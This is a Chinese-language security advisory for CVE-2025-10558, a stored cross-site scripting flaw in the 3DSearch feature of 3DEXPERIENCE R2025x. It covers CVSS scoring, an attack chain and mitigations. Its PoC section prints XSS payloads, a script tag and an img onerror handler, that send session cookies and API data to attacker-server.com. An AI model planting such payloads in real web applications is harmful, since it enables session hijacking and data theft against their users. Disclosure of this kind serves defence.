CVE-2025-10558：3DEXPERIENCE R2025x 3DSwymer存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10558

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Dassault Systèmes 3DEXPERIENCE R2025x 中的 3DSwymer 组件（3DSearch 功能）

漏洞概述

CVE-2025-10558 是 Dassault Systèmes 3DEXPERIENCE 平台 R2025x 版本中 3DSwymer 组件的 3DSearch 功能存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由 3DS 信息安全团队（[email protected]）发现并报告，于 2025 年 10 月 13 日公开披露。

3DEXPERIENCE 是 Dassault Systèmes 推出的一款企业级协作平台，广泛应用于产品设计、工程仿真、制造和协作等领域。3DSwymer 是该平台中负责社交协作与知识共享的组件，允许用户搜索、分享和讨论项目内容。3DSearch 作为 3DSwymer 的核心搜索功能，允许用户在平台上搜索各类资源和信息。

该漏洞的 CVSS 3.1 基础评分为 8.7，属于高危级别。其 CVSS 向量为 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N，表明该漏洞可通过网络远程利用，攻击复杂度低，仅需低权限认证即可触发，但需要用户交互（如访问被注入恶意脚本的页面）。漏洞的范围（Scope）发生了变化（Scope Changed），对机密性和完整性产生高影响，但对可用性无影响。

存储型 XSS 漏洞意味着攻击者可以将恶意脚本代码永久存储在目标服务器上，当其他用户访问受影响的页面时，恶意代码将在其浏览器中自动执行。这种类型的 XSS 漏洞危害极大，可能导致会话劫持、数据窃取、权限提升甚至完全控制受害者的账户。

技术细节

该漏洞存在于 3DEXPERIENCE R2025x 平台的 3DSwymer 组件的 3DSearch 功能中。具体技术原理如下：

3DSearch 功能在处理用户输入的搜索关键词或其他相关内容时，未对输入数据进行充分的过滤和转义处理。攻击者可以利用这一缺陷，将恶意的 JavaScript 代码作为合法输入提交到搜索功能中。由于该漏洞属于存储型 XSS，恶意代码会被持久化存储在服务器端的数据库或文件系统中。

当其他具有相应权限的用户（甚至普通用户）通过浏览器访问包含恶意脚本的搜索结果页面或相关页面时，服务器会将存储的恶意代码作为正常页面内容返回给客户端浏览器。由于浏览器无法区分合法内容和恶意代码，恶意脚本将在受害者的浏览器上下文中执行。

利用方式：
1. 攻击者需要拥有 3DEXPERIENCE 平台的低权限账户（PR:L）；
2. 攻击者通过 3DSearch 功能提交包含恶意 JavaScript 代码的输入；
3. 恶意代码被服务器存储；
4. 当受害者浏览相关搜索结果页面时，恶意代码自动执行；
5. 攻击者可以窃取受害者的会话 Cookie、进行钓鱼攻击、篡改页面内容或执行其他恶意操作。

由于 Scope 标记为 Changed（C），漏洞的影响超出了 3DSearch 组件本身，可能影响到 3DEXPERIENCE 平台的其他安全上下文。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者首先获取 3DEXPERIENCE 平台的低权限账户，可以通过社会工程、购买凭证或利用其他漏洞获得。

STEP 2

步骤2：注入恶意脚本

攻击者登录平台后，通过 3DSwymer 的 3DSearch 功能提交包含恶意 JavaScript 代码的搜索输入或相关内容。

STEP 3

步骤3：恶意代码持久化

由于 3DSearch 未对输入进行充分的过滤和转义，恶意脚本被存储到服务器端的数据库中，形成存储型 XSS。

STEP 4

步骤4：触发执行

当其他用户（受害者）通过浏览器访问包含恶意脚本的搜索结果页面时，服务器返回包含恶意代码的页面内容。

STEP 5

步骤5：浏览器执行恶意代码

受害者的浏览器将恶意脚本作为合法页面内容执行，攻击者可以窃取会话 Cookie、进行钓鱼或执行其他恶意操作。

STEP 6

步骤6：权限提升与数据窃取

利用窃取的会话信息，攻击者可以冒充受害者身份访问平台资源，可能导致敏感数据泄露或进一步权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-10558 Stored XSS PoC for 3DSearch in 3DSwymer -->
<!-- This PoC demonstrates a stored XSS attack via the 3DSearch functionality -->

<!-- Step 1: Attacker logs in with low-privilege account -->
<!-- Step 2: Attacker submits a malicious payload through 3DSearch input field -->

<!-- Malicious payload example (to be injected into search input or related fields): -->
<script>
    // Steal session cookie and send to attacker's server
    var cookie = document.cookie;
    var img = new Image();
    img.src = 'https://attacker-server.com/steal?cookie=' + encodeURIComponent(cookie);
    
    // Or perform actions on behalf of the victim
    // fetch('/api/sensitive-endpoint', { credentials: 'include' })
    //     .then(r => r.json())
    //     .then(data => {
    //         fetch('https://attacker-server.com/exfil', {
    //             method: 'POST',
    //             body: JSON.stringify(data)
    //         });
    //     });
</script>

<!-- Alternative payload using event handlers -->
<img src=x onerror="fetch('https://attacker-server.com/steal?cookie='+document.cookie)">

<!-- Step 3: Malicious payload is stored on the server -->
<!-- Step 4: When victim views the search results page, payload executes in their browser -->
<!-- Step 5: Attacker receives victim's session data or performs unauthorized actions -->

影响范围

3DEXPERIENCE R2025x（3DSwymer 组件的 3DSearch 功能）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制 3DSearch 功能的访问权限，仅允许可信用户使用；2）在 Web 代理或 WAF 中部署 XSS 防护规则，过滤常见恶意脚本模式；3）配置内容安全策略（CSP），限制内联脚本执行；4）为所有会话 Cookie 设置 HttpOnly 和 Secure 标志，降低 XSS 窃取风险；5）密切监控系统日志，检测异常搜索请求或可疑活动；6）教育用户不要点击可疑链接或访问未知来源的搜索结果。